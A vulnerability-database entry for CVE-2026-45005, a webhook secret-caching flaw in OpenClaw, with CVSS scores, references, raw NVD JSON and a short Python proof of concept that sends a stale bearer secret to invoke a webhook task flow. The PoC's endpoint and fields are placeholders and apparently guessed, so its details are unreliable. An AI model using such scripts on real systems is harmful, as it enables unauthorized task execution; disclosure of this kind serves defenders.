CVE-2026-45005

Description

OpenClaw before 2026.4.23 caches resolved webhook route secrets backed by SecretRef values, allowing stale secrets to remain valid after rotation and reload. Attackers with previously valid webhook route secrets can continue authenticating requests and invoking configured webhook task flows until gateway or plugin restart.

CVSS Details

CVSS Score

6.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

OpenClaw < 2026.4.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target OpenClaw Webhook Endpoint
target_url = "http://vulnerable-openclaw-instance/api/webhook/invoke"

# The old/compromised secret that should be invalid after rotation
# but remains valid due to improper cache invalidation
stale_secret = "previous_webhook_secret_token"

headers = {
    "Content-Type": "application/json",
    "Authorization": f"Bearer {stale_secret}"  # Or however the secret is passed (e.g., header, query param)
}

# Payload to trigger a task flow
payload = {
    "flow_id": "target_task_flow",
    "action": "execute"
}

try:
    print(f"[*] Attempting to invoke webhook using stale secret: {stale_secret}")
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! The server accepted the stale secret.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(f"[-] Response: {response.text}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45005
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45005
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45005/
[4] VulDB https://vuldb.com/cve/CVE-2026-45005
[5] https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9
[7] https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45005", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:40.813", "lastModified": "2026-05-12T14:20:56.547", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.4.23 caches resolved webhook route secrets backed by SecretRef values, allowing stale secrets to remain valid after rotation and reload. Attackers with previously valid webhook route secrets can continue authenticating requests and invoking configured webhook task flows until gateway or plugin restart."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-672"}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa", "source": "[email protected]"}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation", "source": "[email protected]"}]}}